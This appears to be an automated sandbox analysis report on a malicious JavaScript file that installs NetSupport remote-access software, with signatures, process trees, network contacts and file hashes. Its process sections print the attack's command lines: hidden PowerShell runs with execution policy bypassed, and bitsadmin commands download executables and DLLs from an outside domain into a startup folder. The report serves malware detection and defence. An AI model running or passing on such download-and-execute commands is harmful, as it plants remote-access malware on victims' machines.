Analysis Overview
SHA256
c4a3d1cec5bac2e0f1eb4671633ee0650b07831004130bd1d76c503655d2d26f
Threat Level: Known bad
The file ave6119jsjsjsjsjsjsjsjsjs.js was found to be: Known bad.
Malicious Activity Summary
NetSupport
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Enumerates physical storage devices
Download via BitsAdmin
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-07-09 19:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-07-09 19:19
Reported
2023-07-09 19:22
Platform
win7-20230703-en
Max time kernel
75s
Max time network
79s
Command Line
Signatures
Enumerates physical storage devices
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6119jsjsjsjsjsjsjsjsjs.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\cv3ibkm.ps1
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.exe C:\Users\Admin\AppData\RoamingOfficeStartupclient32.exe
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.ini C:\Users\Admin\AppData\RoamingOfficeStartupclient32.ini
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/HTCTL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupHTCTL32.DLL
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/msvcr100.dll C:\Users\Admin\AppData\RoamingOfficeStartupmsvcr100.dll
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/nskbfltr.inf C:\Users\Admin\AppData\RoamingOfficeStartupnskbfltr.inf
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | virvatulishop.com | udp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| US | 192.229.211.108:80 | tcp |
Files
memory/2336-60-0x000000001B370000-0x000000001B652000-memory.dmp
memory/2336-61-0x0000000001FC0000-0x0000000001FC8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\cv3ibkm.ps1
| MD5 | 7269a83e127ff320b1f8810b6623ee98 |
| SHA1 | 52d53be0e3bf58d1a330f24f7a4f1f6ee543b4a2 |
| SHA256 | 9bb8941997354717115d7d57f559b16a5d4be037843cd2403ce16e61add7d404 |
| SHA512 | 3bb453737c33a01ea10d365b93685a0d53d7a396d0d1a46466a08388acc49e662fd25300e36695466690cbf9198df9bb50dc1dd0ac6bf92aa7e37ca5152e9877 |
memory/2336-63-0x0000000002920000-0x00000000029A0000-memory.dmp
memory/2336-64-0x0000000002920000-0x00000000029A0000-memory.dmp
memory/2336-65-0x0000000002920000-0x00000000029A0000-memory.dmp
memory/2336-66-0x0000000002920000-0x00000000029A0000-memory.dmp
memory/2336-67-0x0000000002920000-0x00000000029A0000-memory.dmp
memory/2336-68-0x0000000002920000-0x00000000029A0000-memory.dmp
memory/2336-69-0x0000000002920000-0x00000000029A0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-07-09 19:19
Reported
2023-07-09 19:22
Platform
win10v2004-20230703-en
Max time kernel
143s
Max time network
151s
Command Line
Signatures
NetSupport
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 880 wrote to memory of 2660 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 880 wrote to memory of 2660 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2660 wrote to memory of 2560 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe |
| PID 2660 wrote to memory of 2560 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe |
| PID 2660 wrote to memory of 2560 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6119jsjsjsjsjsjsjsjsjs.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\i5e0n45.ps1
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe
"C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.133.255.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.209.218.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | virvatulishop.com | udp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| US | 8.8.8.8:53 | 24.245.44.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | deperekanuki1.com | udp |
| RU | 5.42.74.53:5222 | deperekanuki1.com | tcp |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| US | 8.8.8.8:53 | 53.74.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| GB | 51.142.119.24:80 | geo.netsupportsoftware.com | tcp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.119.142.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
Files
memory/2660-142-0x0000027A64400000-0x0000027A64422000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y1mdb2oz.yys.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\i5e0n45.ps1
| MD5 | 5147a0d331648239ca26cbec34e9e166 |
| SHA1 | cf1616c225da3983a31378a176356d434f7b89ea |
| SHA256 | 0de826ed5b7c41eec6d359a8b560ba8df6d957da91452f1bb9e47119f0d3de58 |
| SHA512 | 067164752f00e9d5fdcbb6c1d7952c9fd8be0586db983c395536973507dea07e49c826683ffe97aa54c9a5b4257ab95002949a2332638cf25108e0cba2290629 |
memory/2660-149-0x0000027A63ED0000-0x0000027A63EE0000-memory.dmp
memory/2660-148-0x0000027A63ED0000-0x0000027A63EE0000-memory.dmp
memory/2660-150-0x0000027A7EB40000-0x0000027A7EB54000-memory.dmp
memory/2660-151-0x0000027A7EB60000-0x0000027A7EB72000-memory.dmp
memory/2660-152-0x0000027A7EB30000-0x0000027A7EB3A000-memory.dmp
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe
| MD5 | 45fe5531717cd1b9532cbb6a5daaeb3a |
| SHA1 | cb908e267a08c37d7e184f47f788e82cca38f83e |
| SHA256 | ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9 |
| SHA512 | 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb |
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe
| MD5 | 45fe5531717cd1b9532cbb6a5daaeb3a |
| SHA1 | cb908e267a08c37d7e184f47f788e82cca38f83e |
| SHA256 | ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9 |
| SHA512 | 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb |
memory/2660-188-0x0000027A63ED0000-0x0000027A63EE0000-memory.dmp
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe
| MD5 | 45fe5531717cd1b9532cbb6a5daaeb3a |
| SHA1 | cb908e267a08c37d7e184f47f788e82cca38f83e |
| SHA256 | ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9 |
| SHA512 | 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb |
C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.dll
| MD5 | 9c9302e75c25c2ba996efd89a1047205 |
| SHA1 | 9e79627ff32d5abd3382b65a509baeb31c78a7f2 |
| SHA256 | beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1 |
| SHA512 | d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1 |
C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.DLL
| MD5 | 9c9302e75c25c2ba996efd89a1047205 |
| SHA1 | 9e79627ff32d5abd3382b65a509baeb31c78a7f2 |
| SHA256 | beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1 |
| SHA512 | d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1 |
C:\Users\Admin\AppData\RoamingOfficeStartup\pcichek.dll
| MD5 | 104b30fef04433a2d2fd1d5f99f179fe |
| SHA1 | ecb08e224a2f2772d1e53675bedc4b2c50485a41 |
| SHA256 | 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd |
| SHA512 | 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f |
C:\Users\Admin\AppData\RoamingOfficeStartup\pcicapi.dll
| MD5 | 34dfb87e4200d852d1fb45dc48f93cfc |
| SHA1 | 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641 |
| SHA256 | 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703 |
| SHA512 | f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2 |
C:\Users\Admin\AppData\RoamingOfficeStartup\PCICHEK.DLL
| MD5 | 104b30fef04433a2d2fd1d5f99f179fe |
| SHA1 | ecb08e224a2f2772d1e53675bedc4b2c50485a41 |
| SHA256 | 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd |
| SHA512 | 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f |
C:\Users\Admin\AppData\RoamingOfficeStartup\pcicapi.dll
| MD5 | 34dfb87e4200d852d1fb45dc48f93cfc |
| SHA1 | 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641 |
| SHA256 | 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703 |
| SHA512 | f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2 |
C:\Users\Admin\AppData\RoamingOfficeStartup\MSVCR100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\RoamingOfficeStartup\msvcr100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\RoamingOfficeStartup\msvcr100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\RoamingOfficeStartup\NSM.LIC
| MD5 | b9956282a0fed076ed083892e498ac69 |
| SHA1 | d14a665438385203283030a189ff6c5e7c4bf518 |
| SHA256 | fcc6afd664a8045bd61c398be3c37a97536a199a48d277e11977f93868ae1acc |
| SHA512 | 7daa09113c0e8a36c91cc6d657c65851a20dff6b60ac3d2f40c5737c12c1613c553955f84d131ba2139959973fef9fc616ca5e968cb16c25acf2d4739eed87eb |
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.ini
| MD5 | a252f22f61f960c54fa32ae0de7dd17c |
| SHA1 | 00fe1097e70f1f6307e6bc68f40d49abb01dd2d5 |
| SHA256 | a5be7a73bbed8ec4e1a7819289da5412fe9ddf628941aa3b35fbe7454f148618 |
| SHA512 | 7998e6cd43853b77e38cfedf0b6081c2965c9facb891ebd9a33db0e39b71d683f218174d87f99d5ab22983632c4c319bd63ec9dcbf1cbc81a77e3053ae3f1593 |
C:\Users\Admin\AppData\RoamingOfficeStartup\HTCTL32.DLL
| MD5 | c94005d2dcd2a54e40510344e0bb9435 |
| SHA1 | 55b4a1620c5d0113811242c20bd9870a1e31d542 |
| SHA256 | 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899 |
| SHA512 | 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a |
C:\Users\Admin\AppData\RoamingOfficeStartup\HTCTL32.DLL
| MD5 | c94005d2dcd2a54e40510344e0bb9435 |
| SHA1 | 55b4a1620c5d0113811242c20bd9870a1e31d542 |
| SHA256 | 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899 |
| SHA512 | 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a |